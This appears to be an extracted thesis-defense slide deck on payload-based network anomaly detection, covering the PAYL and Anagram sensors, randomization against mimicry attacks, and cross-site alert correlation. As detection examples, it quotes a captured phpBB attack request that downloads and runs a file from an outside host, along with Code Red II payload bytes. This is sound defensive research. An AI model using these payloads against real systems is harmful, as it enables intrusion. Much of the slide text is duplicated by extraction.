Upload
tareq
View
62
Download
0
Tags:
Embed Size (px)
DESCRIPTION
Network Payload-based Anomaly Detection and Content-based Alert Correlation. Ke Wang Thesis Defense Aug. 14 th , 2006 Department of Computer Science Columbia University. Why do we need payload-based anomaly detection. - PowerPoint PPT Presentation
Citation preview
1
Network Payload-based Anomaly Detection and
Content-based Alert Correlation
Ke WangKe WangThesis DefenseThesis DefenseAug. 14Aug. 14thth, 2006, 2006
Department of Computer ScienceDepartment of Computer ScienceColumbia UniversityColumbia University
2
Why do we need Why do we need payload-based anomaly payload-based anomaly
detectiondetection Attacks that are normal connections Attacks that are normal connections
may carry bad (anomalous) content may carry bad (anomalous) content indicative of a new exploitindicative of a new exploit
Slow and stealthy, or targeted/hitlist Slow and stealthy, or targeted/hitlist worms do not display “loud and worms do not display “loud and obvious” scanning or propagation obvious” scanning or propagation behavior detectable via flow statistics behavior detectable via flow statistics
This sensor augments other sensors This sensor augments other sensors and enriches the view of the networkand enriches the view of the network
3
Conjecture and GoalConjecture and Goal Detect Zero-Day Exploits via Content AnalysisDetect Zero-Day Exploits via Content Analysis
Worms – propagation detectable via flow statistics Worms – propagation detectable via flow statistics (except perhaps slow worms)(except perhaps slow worms)
Targeted Attacks (sophisticated, stealthy, no “loud and Targeted Attacks (sophisticated, stealthy, no “loud and obvious” propagation) obvious” propagation)
True Zero-day will manifest as “never before seen True Zero-day will manifest as “never before seen data” delivered to an application or serverdata” delivered to an application or server
Learn “typical/normal” data, detect abnormal dataLearn “typical/normal” data, detect abnormal data Generate signature immediately to stop further Generate signature immediately to stop further
propagationpropagation No need to wait until “payload prevalence” (a sufficient No need to wait until “payload prevalence” (a sufficient
number of repeated occurrences of the same content)number of repeated occurrences of the same content) Develop sensors that are accurate, efficient, Develop sensors that are accurate, efficient,
scalable, with resiliency to mimicry attacksscalable, with resiliency to mimicry attacks
4
ContributionsContributions Demonstrate the usefulness of analyzing
network payload for anomaly detection PAYL: 1-gram modelingPAYL: 1-gram modeling Anagram: higher order n-gram modelingAnagram: higher order n-gram modeling
Randomized modeling/testing that can help thwart mimicry attacks
Ingress/egress payload correlation to capture a worm’s initial propagation attempt
Efficient privacy-preserving payload correlation across sites, and automatic signature generation
5
ContributionsContributions Demonstrate the usefulness of analyzing network
payload for anomaly detection PAYL: 1-gram modelingPAYL: 1-gram modeling
Statistical, semantics/language-independent, efficient
Incremental learningIncremental learning Clustering for space savingClustering for space saving Multi-centroids fine grained modelingMulti-centroids fine grained modeling
Anagram: higher order n-gram modelingAnagram: higher order n-gram modeling Randomized modeling/testing that can help thwart mimicry attacks Ingress/egress payload correlation to capture a worm’s initial
propagation attempt Efficient privacy-preserving payload correlation across sites
6
Motivation of PAYLMotivation of PAYL Content traffic to different ports have very Content traffic to different ports have very
different payload distributionsdifferent payload distributions Within one port, packets with different Within one port, packets with different
lengths also have different payload lengths also have different payload distributionsdistributions
Furthermore, worm/virus payloads usually Furthermore, worm/virus payloads usually are quite different from normal distributionsare quite different from normal distributions
Previous work: Previous work: Attack signature: Snort, BroAttack signature: Snort, Bro First few bytes of a packet: NATE, PHAD, ALADFirst few bytes of a packet: NATE, PHAD, ALAD Service-specific IDS [CKrugel02]: coarse Service-specific IDS [CKrugel02]: coarse
modeling, 256 ASCII characters in 6 groups.modeling, 256 ASCII characters in 6 groups.
7
Dest Port 22 Dest Port 25 Dest Port 80
Src Port 22 Src Port 25 Src Port 80
Example byte distributions Example byte distributions for different portsfor different ports
ssh Mail Web
8
Example byte distribution for Example byte distribution for different payload lengths of port 80 different payload lengths of port 80
on the same host serveron the same host server
9
CR II distribution versus a CR II distribution versus a normal distributionnormal distribution
10
How to model “normal” How to model “normal” content: content:
1-gram Centroid1-gram CentroidThe average relative frequency of each byte, The average relative frequency of each byte, and the standard deviation of the frequency and the standard deviation of the frequency of each byte, for payload length 185 of port of each byte, for payload length 185 of port 80 80
11
PAYL operationPAYL operation Learning phaseLearning phase
Models are computed from packet stream Models are computed from packet stream incrementally incrementally conditioned on port/service and length of packetconditioned on port/service and length of packet
Hands-free epoch-based trainingHands-free epoch-based training Fine-grained multi-centroids modelingFine-grained multi-centroids modeling
ClusteringClustering: merge two neighbouring centroids if their : merge two neighbouring centroids if their Manhattan distance is smaller than thresholdManhattan distance is smaller than threshold Save space, remove redundancy, linear time Save space, remove redundancy, linear time
computationcomputation Improve the modeling accuracy for those length bins Improve the modeling accuracy for those length bins
with few training data (sparseness)with few training data (sparseness) Self-calibration phaseSelf-calibration phase
Sampled training data sets an initial threshold settingSampled training data sets an initial threshold setting Detection phase Detection phase
Packets are compared against models using simplified Packets are compared against models using simplified Mahalanobis distanceMahalanobis distance
12
Performance comparison: Performance comparison: single centroid vs. multi-single centroid vs. multi-
centroidscentroids
Dataset Dataset WW
Dataset Dataset W1W1
Dataset Dataset EXEX
Single-Single-centroidcentroid
0.66%0.66% 0.487%0.487% 0.982%0.982%
Multi-Multi-centroids centroids (one-pass)(one-pass)
0.42%0.42% 0.225%0.225% 0.32%0.32%
Multi-Multi-centroids centroids (semi-(semi-batched)batched)
0.0086%0.0086% 0.029%0.029% 0.107%0.107%
Test Worms: CR, CRII, WebDAV, and nsiislog.dll buffer overflow vulnerability (MS03-022)
At 0.1% false positive rate: 5.8 alerts/h for EX, 6 alerts/h for W, 8 alerts/h for W1
13
PAYL SummaryPAYL Summary Models: length conditioned character Models: length conditioned character
frequency distribution (1-gram) and frequency distribution (1-gram) and standard deviation of normal trafficstandard deviation of normal traffic
Testing: Mahalanobis distance of the test Testing: Mahalanobis distance of the test packet against the modelpacket against the model
Pro:Pro: Simple, fast, memory efficientSimple, fast, memory efficient
Con:Con: Cannot capture attacks displaying normal byte Cannot capture attacks displaying normal byte
distributiondistribution Easily fooled by mimicry attacks with proper Easily fooled by mimicry attacks with proper
paddingpadding
14
Example: phpBB forum Example: phpBB forum attackattack
Relatively normal byte distribution, so PAYL Relatively normal byte distribution, so PAYL misses itmisses it
Abnormal sequence of commands for exploitationAbnormal sequence of commands for exploitation The attack invariantsThe attack invariants The subsequence of new, distinct bye values should be The subsequence of new, distinct bye values should be
“malicious”“malicious” What we need: capture order dependence of byte What we need: capture order dependence of byte
sequences --- sequences --- higher order n-grams modelinghigher order n-grams modeling
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:.128.59.16.26.User‑Agent:.Mozilla/4.0.(compatible;.MSIE.6.0;.Windows.NT.5.1;)..
15
ContributionsContributions Demonstrate the usefulness of analyzing network payload for
anomaly detection PAYL: 1-gram modelingPAYL: 1-gram modeling Anagram: higher order n-gram modelingAnagram: higher order n-gram modeling
Binary-based modelingBinary-based modeling Bloom filter for space efficiencyBloom filter for space efficiency Semi-supervised learningSemi-supervised learning Privacy-preserving payload alert for correlationPrivacy-preserving payload alert for correlation
Randomized modeling/testing that can help thwart mimicry attacks Ingress/egress payload correlation to capture a worm’s initial
propagation attempt Efficient privacy-preserving payload correlation across sites
16
Overview of AnagramOverview of Anagram Binary-base higher order n-grams modelingBinary-base higher order n-grams modeling
Models all the distinct n-grams appearing in the Models all the distinct n-grams appearing in the normal training data normal training data
During test, compute the percentage of never-During test, compute the percentage of never-seen distinct n-grams out of the total n-grams in seen distinct n-grams out of the total n-grams in a packet:a packet:
Semi-supervised learningSemi-supervised learning
Normal traffic is modeledNormal traffic is modeled Prior known malicious traffic is modeled: Prior known malicious traffic is modeled:
Snort Rules, captured malcodeSnort Rules, captured malcode Model is space-efficient by using Bloom Model is space-efficient by using Bloom
filtersfilters Previous workPrevious work
Foreign system call sequences [Forrest96]Foreign system call sequences [Forrest96] Trie-based n-gram storage and comparison for Trie-based n-gram storage and comparison for
network anomaly detection [Rieck06]network anomaly detection [Rieck06]
]1,0[TNScore new
17
18
19
0 1 2 3 4 5 6 70
0.005
0.01
0.015
0.02
0.025
0.03
Training Dataset Length (in days)Fals
e P
ositi
ve R
ate
(%) w
hen
100%
Det
ectio
n R
ate
3-grams5-grams7-grams
False positive rate (with 100% detection rate) with different training time and n of n-grams
Low False positive rate Low False positive rate per packetper packet (better per (better per flow)flow)
No significant gain after No significant gain after 4 days’ training4 days’ training
Higher order n-grams Higher order n-grams needs longer training needs longer training time to build good modeltime to build good model
3-grams are not long 3-grams are not long enough to distinguish enough to distinguish malicious byte malicious byte sequences from normal sequences from normal onesones
Normal traffic: real web traffic collected of two CUCS web servers
Test worms: CR, CRII, WebDAV, Mirela, phpBB forum attack, nsiislog.dll buffer overflow(MS03-022)
20
2 3 4 5 6 7 8 90
0.005
0.01
0.015
0.02
0.025
0.03
0.035
Value n of n-gramsFals
e P
ostit
ive
Rat
e (%
) whe
n 10
0% D
etec
tion
Rat
e
dataset www1-06, normaldataset www1-06, supervised dataset www-06, normaldataset www-06, supervised
The false positive rate (with 100% detection rate) for different n-grams, under both normal and semi-supervised training – per packet rate
21
Mimicry attacksMimicry attacks Attackers can mimic the normal traffic and hide the Attackers can mimic the normal traffic and hide the
exploit inside “the sled” to avoid the sensor easily.exploit inside “the sled” to avoid the sensor easily. Example: polymorphic mimicry worm developed by [OK05] Example: polymorphic mimicry worm developed by [OK05]
targeting PAYL, which do encoding and traffic blending to targeting PAYL, which do encoding and traffic blending to simulate normal profile.simulate normal profile.
22
ContributionsContributions Demonstrate the usefulness of analyzing network
payload for anomaly detection Randomized modeling/testing
that can help thwart mimicry attacks
Ingress/egress payload correlation to capture a worm’s initial propagation attempt
Efficient privacy-preserving payload correlation across sites
23
Randomization against Randomization against mimicry attacksmimicry attacks
The general idea of payload-based mimicry attacks The general idea of payload-based mimicry attacks is by crafting small pieces of exploit code with a is by crafting small pieces of exploit code with a large amount of “normal” padding to make the large amount of “normal” padding to make the whole packet look normal.whole packet look normal.
If we If we randomly choose the payload portionrandomly choose the payload portion for for modeling/testingmodeling/testing, the attacker would not know , the attacker would not know precisely which byte positions it may have to pad to precisely which byte positions it may have to pad to appear normal; harder to hide the exploit code!appear normal; harder to hide the exploit code!
This is a This is a generalgeneral technique can be used for both technique can be used for both PAYL and Anagram, or any other payload anomaly PAYL and Anagram, or any other payload anomaly detector.detector.
For Anagram, additional randomization, keep n-For Anagram, additional randomization, keep n-gram size a secret!gram size a secret!
24
Randomized ModelingRandomized Modeling Separate the whole packet randomly into Separate the whole packet randomly into
several (possibly interleaved) substrings or several (possibly interleaved) substrings or subsequences: subsequences: SS11, S, S22, ..S, ..SNN, and build one , and build one model for each of them model for each of them
Test packet’s payload is divided accordinglyTest packet’s payload is divided accordingly
25
Models from sub-partitions may be similarModels from sub-partitions may be similar Higher memory consumption, no real model diversityHigher memory consumption, no real model diversity
The testing partitioning need to be the same as The testing partitioning need to be the same as training partitioningtraining partitioning Less flexibilityLess flexibility Need to retrain when wants to change partitionsNeed to retrain when wants to change partitions
Top plot is the model built from the whole packet, and the bottom two are the models built from two random sub-partitions.
Shortcomings:
26
Randomized TestingRandomized Testing Simpler strategy that does not incur Simpler strategy that does not incur
substantial overheadsubstantial overhead Build one model for whole packet, Build one model for whole packet,
randomize tested portionsrandomize tested portions Separate the whole packet randomly into Separate the whole packet randomly into
several (possibly interleaved) partitions: several (possibly interleaved) partitions: SS11, , SS22, ..S, ..SNN, ,
Score each randomly chosen partition Score each randomly chosen partition separatelyseparately
Use the maximum score:Use the maximum score: ii TNScore
new/max
27
28
DetectiDetection on
TimesTimes
Avg. FPAvg. FP Std. FPStd. FP
Pure Pure random random maskmask
16/2016/20 0.269%0.269% 0.375%0.375%
Chunked Chunked random random maskmask
14/2014/20 0.175%0.175% 0.409%0.409%
PAYL Test: on the mimicry attack designed by
[OK05] targeting it, 20 fold fold randomized testingrandomized testing
29
Anagram TestAnagram Test: : average false positive rate and standard average false positive rate and standard
deviation withdeviation with 100% detection rate, 100% detection rate, chunked random mask, 10 fold randomized chunked random mask, 10 fold randomized
testingtesting
Normal training Semi-supervised training
30
ContributionsContributions Demonstrate the usefulness of analyzing network
payload for anomaly detection Randomized modeling/testing that can help thwart
mimicry attacks Ingress/egress payload correlation to
capture a worm’s initial propagation attempt Detect slow or stealthy wormsDetect slow or stealthy worms Immediate signature generation
Efficient privacy-preserving payload correlation across sites.
31
Ingress/egress correlation to Ingress/egress correlation to detectdetect
worm’s propagation worm’s propagation ObservationObservation
Self-propagating worms will start attacking other Self-propagating worms will start attacking other machines (by sending at least the exploit portion of its machines (by sending at least the exploit portion of its content) shortly after a host is infected content) shortly after a host is infected
The attacked destination port will be the same since it’s The attacked destination port will be the same since it’s exploiting the same vulnerabilityexploiting the same vulnerability
An approach to stop the worm’s very first An approach to stop the worm’s very first propagation attemptpropagation attempt If we detect anomalous egress packets to port If we detect anomalous egress packets to port ii very very
similar to those anomalous ingress packets to port similar to those anomalous ingress packets to port ii, , there is a high probability that a worm has started its there is a high probability that a worm has started its propagationpropagation
Advantage:Advantage: Can detect Can detect slow or stealthyslow or stealthy worms which won’t show worms which won’t show
probe behavior and thus avoid probe detectorsprobe behavior and thus avoid probe detectors
32
Similarity metrics to compare Similarity metrics to compare the payloads of two or more the payloads of two or more
anomalous packet alertsanomalous packet alerts
2*C/( L1+ L2)
2*C/( L1+ L2)
1 for equal,0 otherwise
Similarity score [0, 1]
SomeYesRaw dataLongest common subsequence (LCSeq)
NoYesRaw dataLongest common substring (LCS)
NoNoRaw dataString equality (SE)
Detect metamorphic
Handle fragment
Data usedMetric
Experiment result
33
|d0|$@|0 ff|5|d0|$@|0|h|d0| @|0|j|1|j|0|U|ff|5|d8|$@|0 e8 19 0 0 0 c3 ff|%`0@|0 ff|%d0@|0 ff|%h0@|0 ff|%p0@|0 ff|%t0@|0 ff|%x0@|0 ff|%|0@|fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 0 0 0 0 0 0 0 0 0 0 0 0 0|\EXPLORER.EXE|0 0 0|SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon|0 0 0|SFCDisable|0 0 9d ff ff ff|SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots|0 0 0 0|/Scripts|0 0 0 0|/MSADC|0 0|/C|0 0|/D|0 0|c:\,,217|0 0 0 0|d:\,,217|fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc…
LCS signature LCS signature generation: generation: Code Red IICode Red II
34
Previous WorkPrevious Work Worm signature generation: Worm signature generation:
Autograph, Earlybird, Honeycomb, Autograph, Earlybird, Honeycomb, Polygraph, HasmaPolygraph, Hasma Detecting frequently occurring payload Detecting frequently occurring payload
substrings or tokens from suspicious IP, substrings or tokens from suspicious IP, which still depends on the scanning which still depends on the scanning behaviorbehavior
Detection occurs some time after the Detection occurs some time after the worm propagationworm propagation
Cannot detect slow and stealthy wormsCannot detect slow and stealthy worms
35
ContributionsContributions Demonstrate the usefulness of analyzing network
payload for anomaly detection Randomized modeling/testing that can help thwart
mimicry attacks Ingress/egress payload correlation to capture a
worm’s initial propagation attempt Efficient privacy-preserving
payload correlation across sites Robust and privacy-preserving means
of representing content-based alerts. Automatic signature generation.
36
Cross-site payload alert Cross-site payload alert correlationcorrelation
Each site has a distinct content flow Each site has a distinct content flow Diversity via content (not system or software)Diversity via content (not system or software)
Find global, common “invariants in content”.Find global, common “invariants in content”. If multiple sites see the same/similar content If multiple sites see the same/similar content
alerts, it’s highly likely to be a true alerts, it’s highly likely to be a true worm/targeted outbreakworm/targeted outbreak
Separate TP’s from FP’s! Separate TP’s from FP’s! The False False The False False PositivePositive Problem Problem
Reduces false positives by creating white Reduces false positives by creating white lists of those alerts that cannot be correlatedlists of those alerts that cannot be correlated
Higher standard to prevent mimicry attackHigher standard to prevent mimicry attack Exploit writers/attackers have to learn the Exploit writers/attackers have to learn the
distinct content traffic patterns of many different distinct content traffic patterns of many different sites sites
Need to be privacy-preservingNeed to be privacy-preserving
37
Related ResearchRelated Research DNAD/Worminator (slow/IP) sharingDNAD/Worminator (slow/IP) sharing Domino alert sharingDomino alert sharing The DShield.org model for content The DShield.org model for content
sharing and queryingsharing and querying Could also serve as a “trap” to detect Could also serve as a “trap” to detect
attacker watermarking behavior attacker watermarking behavior PeerPressure, Privacy-Preserving PeerPressure, Privacy-Preserving
friends troubleshooting networkfriends troubleshooting network
38
Correlation techniquesCorrelation techniques BaselineBaseline
““Raw” Raw” suspect contentsuspect content string-based string-based correlation:correlation: String equality (SE), longest String equality (SE), longest common substring (LCS), longest common common substring (LCS), longest common subsequence (LCSeq), edit distance (ED)subsequence (LCSeq), edit distance (ED)
Frequency-modeled 1-gram correlationFrequency-modeled 1-gram correlation Frequency distribution:Frequency distribution: Manhattan distance Manhattan distance Z-String:Z-String: supports SE, LCS, LCSeq, ED supports SE, LCS, LCSeq, ED
Binary-modeled n-gram correlationBinary-modeled n-gram correlation N-gram signature, Bloom filter n-gram N-gram signature, Bloom filter n-gram
“signature”“signature”
39
Example Example suspect contentsuspect contentThis is a bot command string
Thi, his, is□□, s□i, □is, , s□i, □is, s□a, □a□, a□b, □bo, bot, s□a, □a□, a□b, □bo, bot, ot□, t□c, □co, com, omm, ot□, t□c, □co, com, omm, mma, man, and, nd□, d□s,mma, man, and, nd□, d□s,□□st, str, tri, rin, ingst, str, tri, rin, ing
Original content: 256 bits.
Frequency distribution; the most frequent character is a space (ASCII code 32). Size ≈ 8160
bits.List of 3-grams in original string. A
box represents a space; the underlined n-gram appears twice in the original alert. 25 n-grams take
approximately 600 bits.0000011010101101001101100110101101010…01010011101010101111000Bloom filter of above n-grams. If three hash values are used, a minimum optimal size would be ~ 150 bits.
□□isamnotTbcdghrisamnotTbcdghrZ-String; the space (box) is the most frequent character. Non-
appearing characters are removed.
15 characters = 120 bits.
40
Real traffic evaluationReal traffic evaluation Goal: measure performance in identifying true Goal: measure performance in identifying true
alerts from false positivesalerts from false positives Ideal: true positives have very high similarity Ideal: true positives have very high similarity
scores, while false positives have very low scoresscores, while false positives have very low scores Mix the collection of attacks into two hours of Mix the collection of attacks into two hours of
traffic from traffic from wwwwww and and www1www1 Multiple, differently-fragmented instances of Code Multiple, differently-fragmented instances of Code
Red and Code Red II to simulate a real worm attackRed and Code Red II to simulate a real worm attack Mixed sets are run through PAYL and Mixed sets are run through PAYL and
Anagram, with alerting threshold reduced so Anagram, with alerting threshold reduced so that 100% of attacks are detected, but with that 100% of attacks are detected, but with possibly higher FP ratespossibly higher FP rates
String evaluation
41
Real traffic evaluation Real traffic evaluation (II)(II)
False positive score range; blue bar represents 99.9% percentile; white represents maximum score
Range of scores across multiple instances of the same worm (CR or CRII)Range of scores across instances of different worms (CR vs. CRII), e.g., polymorphism
Methods are, from 1 to 8: Raw-LCS, Raw-LCSeq, Raw-ED, Freq-MD, ZStr-LCS, ZStr-LCSeq, Zstr-ED, N-grams with n=5.
42
Real traffic evaluation Real traffic evaluation (III)(III)
Correlation of identical (non-polymorphic) Correlation of identical (non-polymorphic) attacks works accurately for all techniquesattacks works accurately for all techniques Non-fragmented attacks score near 1Non-fragmented attacks score near 1 Z-Strings (MD, LCseq, ED) and n-grams handle Z-Strings (MD, LCseq, ED) and n-grams handle
fragmentation wellfragmentation well Polymorphism is hard to detect; only Raw-Polymorphism is hard to detect; only Raw-
LCSeq and n-grams score wellLCSeq and n-grams score well Overall, n-grams are particularly effective Overall, n-grams are particularly effective
at eliminating false positives, and Bloom at eliminating false positives, and Bloom filters enable privacy preservationfilters enable privacy preservation
43
Signature GenerationSignature Generation Each class of techniques can generate its own Each class of techniques can generate its own
signaturesignature Raw packets: Exchange LCS/LCSeqRaw packets: Exchange LCS/LCSeq
Not privacy-preservingNot privacy-preserving Byte frequency/Z-StringsByte frequency/Z-Strings
Given the frequency distribution, Z-Strings Given the frequency distribution, Z-Strings generated by ordering from most to least frequent generated by ordering from most to least frequent and dropping the least frequentand dropping the least frequent
N-gramsN-grams Robust to reordering or fragmentationRobust to reordering or fragmentation If position information is available, can “flatten” If position information is available, can “flatten”
into a deployable string signatureinto a deployable string signature
44
Signature/Query Signature/Query generation (II)generation (II)
GET./default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u0
88 0 255 117 48 85 116 101 106 232 100 133 80 254 169 137 56 51
* /def*ult.ida?XXXX*XXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HT*: 3379
Original CRII packet (first 300 bytes)
Z-String (first 20 bytes, ASCII values)
Byte frequency distribution
Flattened 5-grams (first 172 bytes; “*” implies wildcard)
45
Accuracy of the signaturesAccuracy of the signaturesThe accumulative frequency of the signature match scores computed by matching normal traffic against different worm signatures. The closer to the y-axis, the more accurate.
The six curves represent the following, in order from the left to the right: 1) n-grams signature, 2) Z-string signature comparing using LCS, 3) LCSeq of raw signature, 4) Z-string signature using LCSeq, 5) LCSeq of raw signature, 6) byte-frequency signature.
46
Signature for Signature for polymorphic wormpolymorphic worm
Our approaches work poor since they are based Our approaches work poor since they are based on payload similarityon payload similarity
Will there be enough invariants for accurate Will there be enough invariants for accurate signature?signature? Slammer: first byte “0x04”Slammer: first byte “0x04” CLET shellcode 2: CLET shellcode 2: “\0xff\0xff\0xff” and “\0xeb\0x31”.
Proposed alternative: “generalized signature” specifying the higher-level pattern of an attack, instead of raw payload based. “0xeb 0x31”B {92 bytes, entropy: E, “0xff 0xff 0xff”B}
47
ConclusionsConclusions Network payload-based PAYL and Anagram Network payload-based PAYL and Anagram
can detect zero-day attacks with high can detect zero-day attacks with high accuracy and low false positivesaccuracy and low false positives
Randomization help thwart mimicry attackRandomization help thwart mimicry attack Ingress/egress correlation detects worm’s Ingress/egress correlation detects worm’s
initial propagation and generate accurate initial propagation and generate accurate worm signatureworm signature Good at detecting slow/stealth wormsGood at detecting slow/stealth worms
Privacy-preserving payload alerts Privacy-preserving payload alerts correlation across sites can identify true correlation across sites can identify true anomalies and reduces false positiveanomalies and reduces false positive Accurate signature generationAccurate signature generation
48
Accomplishments Accomplishments Major papers:Major papers:
Anagram: A Content Anomaly Detector Resistant to Anagram: A Content Anomaly Detector Resistant to Mimicry Attack,Mimicry Attack, K. Wang, J. Parekh, S. Stolfo, RAID, K. Wang, J. Parekh, S. Stolfo, RAID, Sept 2006. Sept 2006.
Privacy-preserving Payload-based Correlation for Privacy-preserving Payload-based Correlation for Accurate Malicious Traffic DetectionAccurate Malicious Traffic Detection, J. Parekh, K. , J. Parekh, K. Wang, S. Stolfo, SIGCOMM LSAD Workshop, Sept, Wang, S. Stolfo, SIGCOMM LSAD Workshop, Sept, 2006.2006.
Anomalous Payload-based Worm Detection and Anomalous Payload-based Worm Detection and Signature GenerationSignature Generation, K. Wang, G. Cretu, S. Stolfo, , K. Wang, G. Cretu, S. Stolfo, RAID, Sept 2005.RAID, Sept 2005.
FLIPS: Hybrid Adaptive Intrusion Prevention, FLIPS: Hybrid Adaptive Intrusion Prevention, M. M. Locasto, K. Wang, A. Keromytis, S. Stolfo, RAID, Sept. Locasto, K. Wang, A. Keromytis, S. Stolfo, RAID, Sept. 2005.2005.
Anomalous Payload-based Network Intrusion DetectionAnomalous Payload-based Network Intrusion Detection, , K. Wang, S. Stolfo, RAID, Sept 2004.K. Wang, S. Stolfo, RAID, Sept 2004.
Software implementation (licensed by Columbia):Software implementation (licensed by Columbia): PAYL sensorPAYL sensor Anagram sensorAnagram sensor
49
Future WorkFuture Work Further Evaluation – including
measures/features of high-entropy partitions Optimization problem: model parameter
settings (n-gram size, thresholds, etc.), random mask generation
Real deployment of multiple-site correlation
Shadow server architecture implementation and testing
Pushing into the host: integration with instrumented application software
50
Thank you!Thank you! Q/A ? Q/A ?
51
Backup slidesBackup slides
52
Overview of PAYL – How Overview of PAYL – How it worksit works
Principles of operationPrinciples of operation Normal packet content is automatically learnedNormal packet content is automatically learned Based upon unsupervised anomaly detection Based upon unsupervised anomaly detection
algorithmsalgorithms Fine-grained modeling of normal payload Fine-grained modeling of normal payload
Site and application specific, also conditioned on Site and application specific, also conditioned on packet lengthpacket length
Build byte frequency distribution and its standard Build byte frequency distribution and its standard deviation as normal profiledeviation as normal profile
For test data, compute the simplified For test data, compute the simplified Mahalanobis distance against its centroid to Mahalanobis distance against its centroid to measure similaritymeasure similarity
53
Unsupervised Anomaly Unsupervised Anomaly Detection – Core TechnologyDetection – Core Technology
Each site/host has a “unique” content flow that Each site/host has a “unique” content flow that may be automatically learnedmay be automatically learned
UAD Generates model over “unlabeled” dataUAD Generates model over “unlabeled” data Model detectsModel detects
Anomalies in collected training data (Forensics)Anomalies in collected training data (Forensics) Anomalies in data stream (Detection)Anomalies in data stream (Detection)
Computational Approach: Outlier DetectionComputational Approach: Outlier Detection Two frameworks: geometric, probabilistic/statisticalTwo frameworks: geometric, probabilistic/statistical Several algorithms – PAYL is based upon Several algorithms – PAYL is based upon
comparison of content statistical distributionscomparison of content statistical distributions Handles “noise” in dataHandles “noise” in data
No guarantees of “attack-free” dataNo guarantees of “attack-free” data Assumes most data is “attack-free”Assumes most data is “attack-free”
Return to main Return to main slidesslides
54
Epoch-based learningEpoch-based learning To determine how much training data is
enough, or whether the model is ready for use An epoch is measured in terms of the number
of packets analyzed, or by means of a time period
The training phase is sufficiently complete if the model current computed has changed little for several continuous epochs
Need to define model similarity measurements
55
Epoch-based learning: PAYLEpoch-based learning: PAYL Metric 1: number of new centroids produced in the current
epoch, Metric 2: Manhattan distance of each centroid to each
nearest one computed in the prior epoch
Return to main Return to main slidesslides
56
0 50 100 150 200 250 300 350 400 4500
0.001
0.002
0.003
0.004
0.005
0.006
0.007
0.008
0.009
0.01
Per 10000 content packets
Like
lihoo
d of
see
ing
new
n-g
ram
s 3-grams5-grams7-grams
The likelihood of seeing new n-grams, which is the percentage of the new distinct n-grams out of total n-grams in this epoch
Epoch-based learning: Epoch-based learning: AnagramAnagram
57
The computed Mahalanobis The computed Mahalanobis distance of the normal and distance of the normal and
attack packetsattack packets
The normal data’s distances are displayed as The normal data’s distances are displayed as several bandsseveral bands, which illustrates that we might , which illustrates that we might have have multiple centroidsmultiple centroids for one length for one length
58
Multiple centroids Multiple centroids modeling for each lengthmodeling for each length
Goal: build finer-grained models for the Goal: build finer-grained models for the payload to detect anomalies more accuratelypayload to detect anomalies more accurately
Problems:Problems: Don’t know how many clusters may existDon’t know how many clusters may exist Can only access each packet data once in sequence, Can only access each packet data once in sequence,
cannot store them in memorycannot store them in memory So the traditional clustering algorithm like K-means, So the traditional clustering algorithm like K-means,
EM cannot be easily applied hereEM cannot be easily applied here Our solutionOur solution
One-pass online clusteringOne-pass online clustering Improvement: semi-batched one-pass clustering Improvement: semi-batched one-pass clustering
(keep a small buffer and do local optimal clustering)(keep a small buffer and do local optimal clustering)
Back
59
Simplified Mahalanobis Simplified Mahalanobis Distance Distance
Standard metric to compare two Standard metric to compare two statistical distributions:statistical distributions:
x is the test data, and y is its profile. x is the test data, and y is its profile. When we assume each ASCII value When we assume each ASCII value
is independent, the formula can be is independent, the formula can be simplified:simplified:
)()(),( 12 yxCyxyxd T
),( jiij yyCovC
)/|(|),( 1
0 in
i ii yxyxd
Return to main Return to main slidesslides
60
Incremental Learning Incremental Learning
Average of N Average of N data:data:
When the (N+1)When the (N+1)thth data arrives:data arrives:
For the standard deviation, we can rewrite it as the For the standard deviation, we can rewrite it as the following:following:
Therefore, we don’t need to keep previous data to Therefore, we don’t need to keep previous data to update the new average and standard deviationupdate the new average and standard deviation
Now each centroid stores only the average of Now each centroid stores only the average of xx and and xx22
Return to main slidesReturn to main slides
Nxx N
i i
1
1111
Nxxx
NxNxx NN
222 )()()()( EXXEEXXEXVar
61
Manhattan distanceManhattan distance
n
iii yxyxMdis
0
||),(
x y
23||),(6
1
i
ii yxyxMdis
62
Example of clustering Example of clustering across length binsacross length bins
Original centroidsOriginal centroids
Clustered centroidsClustered centroids
Return to main slides
63
Self-calibrationSelf-calibration Training data is sampledTraining data is sampled Use FIFO to keep the most recent samples Use FIFO to keep the most recent samples
to capture concept driftto capture concept drift After training, compute the distances of After training, compute the distances of
samples against the centroid and set the samples against the centroid and set the anomalous threshold to the maximum anomalous threshold to the maximum
At the start of the detection phase, increase At the start of the detection phase, increase the threshold by t% if the alert rate is the threshold by t% if the alert rate is higher than a user-specified parameterhigher than a user-specified parameter
Return to main slides
64
One-pass online One-pass online clustering algorithmclustering algorithm
Problem: The incoming order of the Problem: The incoming order of the packets affect the resultpackets affect the result
while (more packets){p = next packet;if ( p is similar to one of the existing centroids )
merge into that centroidelse
create a new centroid; use p as center
if ( total number of centroids > MaxSize )merge the two nearest ones
}
Return to main slides
65
Continue …Continue …
merge ( c_set1, c_set2) {for (each c in c_set1){
if (c is similar to one of the centroids in c_set2)merge c into that centroid
elseadd c as a new centroid to c_set2
} if ( size of c_set2 > MaxNum)
merge the two nearest ones until (size==MaxNum)}
Return to main slides
66
Improvement: Semi-Improvement: Semi-batched one-pass batched one-pass
clustering for stream clustering for stream processingprocessing
